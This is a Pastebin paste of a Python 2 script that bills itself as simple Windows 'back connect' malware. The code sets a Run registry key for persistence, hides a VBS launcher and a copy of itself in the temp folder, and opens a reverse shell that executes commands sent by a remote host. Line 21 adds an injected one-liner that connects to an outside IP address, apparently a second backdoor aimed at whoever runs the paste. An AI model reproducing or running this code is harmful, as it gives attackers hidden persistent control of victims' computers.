API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 15th, 2019
703
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.06 KB | None | 0 0
raw download clone embed print report
  1. # HACKING WITH PYTHON
  2. # Simple malware for back connect in python for windows ;)
  3.  
  4. # Autor: anarc0der
  5.  
  6. import os
  7. import subprocess
  8. import socket
  9. import sys
  10. import tempfile
  11. from _winreg import *
  12.  
  13. MALWARE_NAME = "malware.exe"
  14. TRIGGER = MALWARE_NAME.replace('.exe','')+".vbs"
  15. KEY_PATH = "Software\Microsoft\Windows\CurrentVersion\Run"
  16. KEY_NAME = "anarc0der_key"
  17. REV_SHELL = "192.168.1.106"
  18. SHELL_PORT = 4444
  19. TRIGGER_PATH = tempfile.gettempdir()+"\\"+TRIGGER
  20. MALWARE_PATH = tempfile.gettempdir()+"\\"+MALWARE_NAME
  21. import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.19.114.185",12568));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
  22. print "[+] Loading Script, please wait..."
  23.  
  24. class My_malware():
  25.  
  26. def infect_windows_register_keys(self):
  27. """ Method to register malware on windows keys.
  28. Returns False if didnt have key for malware.
  29. Returns True if already have key for malware. """
  30. key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH)
  31. keys = []
  32. try:
  33. i=0
  34. while True:
  35. cur_key = EnumValue(key, i)
  36. keys.append(cur_key[0])
  37. i+=1
  38. except:
  39. pass
  40. if KEY_NAME not in keys:
  41. mlwr_key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH, 0, KEY_ALL_ACCESS)
  42. SetValueEx(mlwr_key, KEY_NAME, 0, REG_SZ, TRIGGER_PATH)
  43. mlwr_key.Close()
  44. return False
  45. return True
  46.  
  47. def hide_malware_and_trigger(self):
  48. """ Method to generate & hide the trigger and malware.
  49. Return True if was alredy hided.
  50. Return False if wasnt hided """
  51. if os.path.exists(MALWARE_PATH) and os.path.exists(TRIGGER_PATH):
  52. return True
  53. else:
  54. payload = 'Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false'.format(MALWARE_PATH)
  55. with open(TRIGGER_PATH, 'w') as f:
  56. f.write(payload)
  57. os.system('copy %s %s'%(MALWARE_NAME, MALWARE_PATH))
  58. return False
  59.  
  60. def reverse_shell_function(self):
  61. """ Method of reverse shell in python """
  62. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  63. s.connect((REV_SHELL,SHELL_PORT))
  64. s.send('\n\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n')
  65. while True:
  66. data = s.recv(1024)
  67. if "quit" in data:
  68. break
  69. cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  70. saida_cmd = cmd.stdout.read() + cmd.stderr.read()
  71. s.send(saida_cmd)
  72. s.send("Comando: ")
  73. s.close()
  74.  
  75. def main():
  76. my_returns = []
  77. x = My_malware()
  78. my_returns.append(x.infect_windows_register_keys())
  79. my_returns.append(x.hide_malware_and_trigger())
  80. if all(res is True for res in my_returns):
  81. x.reverse_shell_function()
  82.  
  83. if __name__ == '__main__':
  84. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!